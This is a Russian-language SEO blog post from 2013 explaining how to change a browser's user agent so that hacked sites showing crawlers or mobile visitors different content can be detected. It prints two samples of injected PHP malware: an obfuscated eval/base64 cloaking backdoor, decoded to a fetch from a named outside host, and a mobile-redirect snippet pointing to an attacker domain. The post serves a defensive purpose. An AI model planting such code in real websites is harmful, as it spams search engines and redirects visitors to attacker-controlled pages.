Как поменять юзер-агент в браузере

Суббота, 02 Фев 2013 23:23

Как поменять юзер-агент в браузере
Что такое  юзер-агент и для чего его нужно менять?
User Agent (юзер-агент) - клиентское  приложение, работающее по определенным правилам (протоколам).
В роли таких приложений могут выступать  различные  браузеры, мобильные устройства (смартфоны), роботы поисковых систем.  При посещении какого-либо веб-узла, сео-блога в интернете приложение посылает информацию о себе  виде   HTTP-запроса, который начинается словами: User-Agent (User-agent). Эта информация обычно включает в себя такие данные, как наименование приложения, его версию, версию операционной системы и язык пользователя.
У поисковых роботов юзер-агент обычно содержит и адрес его веб-узла. Например,  поисковый робот Гугла Googlebot (Google) имеет следующий юзер-агент: Googlebot/2.1 (+http://www.google.com/bot.html). Если перейти по ссылке, указанной в круглых скобках, мы попадем на страницу Справки – Инструменты для вебмастеров и сможем прочитать полезную информацию по работе робота Гуглбота  (это разработанная Google программа сканирования Интернета (паук), – именно такими словами начинается справочная информация).
Теперь разобравшись с тем, что такое User-agent, разберемся с тем, зачем его нужно менять.
Ситуацию  наподобие той, что многие браузеры стали скрывать свой юзер-агент для того, чтобы получить информацию, закрытую от них настройками сайта (например, через  robots.txt), мы рассматривать не будем, а рассмотрим более практические вещи.
Кстати, интересно будет знать, что многие приложения содержат вначале запроса слово «Mozilla» (например, Mozilla/5.0), но это не значит, что все они используют популярный браузер Mozilla Firefox, а обозначает лишь отголоски 90-х годов, когда разработчики  Internet Explorer сознательно  меняли  строки User-Agent для того, чтобы получать контент с сайтов, предназначенный для их главного конкурента в то время – интернет-браузера Netscape Navigator.

Итак, для чего  нужно менять свой User-Agent? Бывают разные ситуации, например, вам надо посмотреть сайт глазами поискового робота.  Зачем это делать? Потому что бывают ситуации, когда на блог или сайт внедряют посторонний код или скрипт, но внешне этого заметить никак нельзя, внешне сайт будет выглядеть абсолютно нормально, и  даже в исходном коде страницы нельзя найти никаких изменений. Но если зайти на взломанный сайт как поисковый робот, то мы увидим совершенно другую информацию, совсем не то, что надо.
То есть при взломе сайта  поисковым ботам и юзерам подсовывается абсолютно разный контент. Приведу пример, чтобы было понятно:
В какой-либо файл встраивается, например, такой код:

<   ?   php
Error_Reporting(E_ERROR);
$u=strtolower($_SERVER[“HTTP_USER_AGENT”]);
if (strstr($u,”crawler”)or strstr($u,”googlebot”)or strstr($u,”msnbot”)or strstr($u,”yahoo”)or strstr($u,”search”)or strstr($u,”bing”)or strstr($u,”indexer”)or strstr($u,”cuill.com”)or strstr($u,”clushbot”))
{eval(gzinflate(base64_decode(‘FctND4IgGADgn2PegmWX1iVlmE1qL80PLg2

UhgqTTfuwX1+dnz36Ke1KyUlvN7dWN2OrV4GohFGx6eqKWdbDXdCiVxjsKW

57TvyrdhEI5GeVMln09lFaw4UdlnNVDIAEEsQwtR4XmRwGTgi+pkOk3XHJK5

Al8WPtEFc0mwV9d4DNWOMI2uL/Ic8dTD+nDc4SVnqZu/nBEXwuvPGn67QPwnD3BQ==’)));};
?    >

Код зашифрован через eval.  Расшифровка eval(gzinflate(base64_decode даёт следующее:

eval(base64_decode(‘ZXZhbChiYXNlNjRfZGVjb2RlKCdjSEpwYm5RZ1ptbHNa

VjluWlhSZlkyOXVkR1Z1ZEhNb0oyaDBkSEE2THk5emIyMXRaWEpoYm1SbGJt

ZGxiR2hoY25RdVkyOXRMMmRsYm1Gc2JDNWpaMmtuS1RzPScpKTs=’));

затем

eval(base64_decode(‘cHJpbnQgZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly

9zb21tZXJhbmRlbmdlbGhhcnQuY29tL2dlbmFsbC5jZ2knKTs=’));

И конечный итог:
print file_get_contents(‘http://sommerandengelhart.com/genall.cgi’);
Так ломали сайты на joomla, поскольку именно там хакер нашёл уязвимость в движке. Но ботам необязательно будет подсовываться другой контент, на сайте просто может прописаться посторонняя ссылка, как на рисунке (кликабельно):
как выглядит посторонний код на сайте
Но ссылку эту на странице вы не найдете, поскольку она скрыта значением:
“position:absolute;left:-2012px”
А вот если поменять атрибут на “position:static”, то ссылка выскочит в самом верху страницы:
как увидеть скрытую ссылкуДля чего ещё бывает нужно поменять юзер-агент в своем браузере? Это бывает полезно также для того, чтобы определить взлом сайта, если никаких видимых признаков взлома нет.
Например, не так давно я писал  о взломе сайтов на ДЛЕ. Кто не читал ту статью  – напомню,  тогда было взломано много сайтов и в некоторые файлы был прописан вредоносный код:

$iphone = strpos($_SERVER[‘HTTP_USER_AGENT’], «iPhone»);
$android = strpos($_SERVER[‘HTTP_USER_AGENT’], «Android»);
$palmpre = strpos($_SERVER[‘HTTP_USER_AGENT’], «webOS»);
$berry = strpos($_SERVER[‘HTTP_USER_AGENT’], «BlackBerry»);
$ipod = strpos($_SERVER[‘HTTP_USER_AGENT’], «iPod»);
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header(‘Location: http://statuses.ws/’);

Данный код никак не влиял на работу сайта, а всего лишь проверял User-Agent приложения, с которого пользователи заходили на сайты. И если обнаруживал мобильное устройство в качестве юзера – происходил редирект на сайт взломщика.
Естественно, что обнаружить такой редирект было нельзя, заходя с обычного браузера. Обнаружить взлом можно было либо зайдя  на сайт dle с мобильного устройства – айфона, айпода и т. п.,  либо поменяв юзер-агент.
А теперь самый простой способ, как это можно сделать. Можно, конечно, лезть в настройки Оперы, Файрфокса (about:config) и менять там стандартную конфигурацию, но можно сделать значительно проще. Для этого устанавливаем в Mozilla Firefox весьма полезное расширение, которое называется  User Agent Switcher. Сделать это можно через Инструменты – Дополнения – Расширения – Поиск среди дополнений.
Agent Switcher меняет юзер агент в браузере
Или же просто перейдите по данной ссылке:
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/
Последняя версия дополнения на сегодняшний день – User Agent Switcher 0.7.3. Жмите на зелёную кнопку  «Add to Firefox», дополнение загрузится  и установится. После перезагрузки браузера им уже можно пользоваться.
Настройки там предельно просты – в пункте меню «Инструменты» появятся дополнительные поля  юзер-агентов. Теперь для того, чтобы поменять свой дефолтный  User-agent, скажем, на айфон, достаточно выбрать значение iPhone 3.0 как на рисунке.
И напоследок традиционный анекдот:
Крупная корпорация возьмет на высокооплачиваемую должность опытного хакера.
Резюме размещать на главной странице сайта microsoft.comsmile
Всем удачи!

    Подпишитесь на комментарии, чтобы не пропустить
    важный ответ:



подписка на rss RSS - подписка
    подписка twitter Twitter - подписка

Вы можете оставить отзыв или трекбек со своего сайта.

Отзывов: 7 на «Как поменять юзер-агент в браузере»

  1. Светлана пишет:

    03 Фев 2013 в 22:29

    Спасибо вам большое за пояснение, а то я раньше думала, что поменять свой юзер-агент в брузере чрезвычайно сложно)

    [Ответить]

    seo Reply:

    Ну, не то чтобы очень сложноsmile

    [Ответить]

  2. victor78 пишет:

    04 Фев 2013 в 17:13

    Я не могу понять, этот код шелла – он не не работает? Или его выложили не целиком?

    [Ответить]

    seo Reply:

    Здесь нет кода шелла. Если имеется в виду код, зашифрованный через eval, то он выложен полностью. Просто код разделяют несколько пробелов, поскольку целиком он не переносился на другую строчку и растягивал сообщение на всю ширину страницы. В исходном коде пробелов нет.

    [Ответить]

  3. Песенка алматинского сеошника | SEO-semki пишет:

    09 Фев 2013 в 22:03

    […] раз я писал о том, как поменять юзер-агент в браузере,  а сейчас предлагаю  немного расслабиться и […]

  4. Уязвимость крылась на хостинге | SEO-semki пишет:

    16 Янв 2014 в 20:08

    […] он проверял user agent браузера  и если определял их как web-краулеры (пауки) или […]

  5. Как защитить сайт от взлома | SEO-semki пишет:

    16 Янв 2014 в 20:59

    […] .htaccess мобильные редиректы, которые также проверяют user-agent браузера, и тех, кто заходит на сайт с мобильных устройств, […]

Ваш отзыв

http://seo-semki.ru/icons/wpml_bye.gif 
:bye:
http://seo-semki.ru/icons/wpml_good.gif 
:good:
http://seo-semki.ru/icons/wpml_negative.gif 
:negative:
http://seo-semki.ru/icons/wpml_scratch.gif 
:scratch:
http://seo-semki.ru/icons/wpml_wacko.gif 
:wacko:
http://seo-semki.ru/icons/wpml_yahoo.gif 
:yahoo:
http://seo-semki.ru/icons/wpml_cool.gif 
B-)
http://seo-semki.ru/icons/wpml_heart.gif 
:heart:
http://seo-semki.ru/icons/wpml_rose.gif 
:rose:
http://seo-semki.ru/icons/wpml_smile.gif 
:-)
http://seo-semki.ru/icons/wpml_whistle3.gif 
:whistle:
http://seo-semki.ru/icons/wpml_yes.gif 
:yes:
http://seo-semki.ru/icons/wpml_cry.gif 
:cry:
http://seo-semki.ru/icons/wpml_mail.gif 
:mail:
http://seo-semki.ru/icons/wpml_sad.gif 
:-(
http://seo-semki.ru/icons/wpml_unsure.gif 
:unsure:
http://seo-semki.ru/icons/wpml_wink.gif 
;-)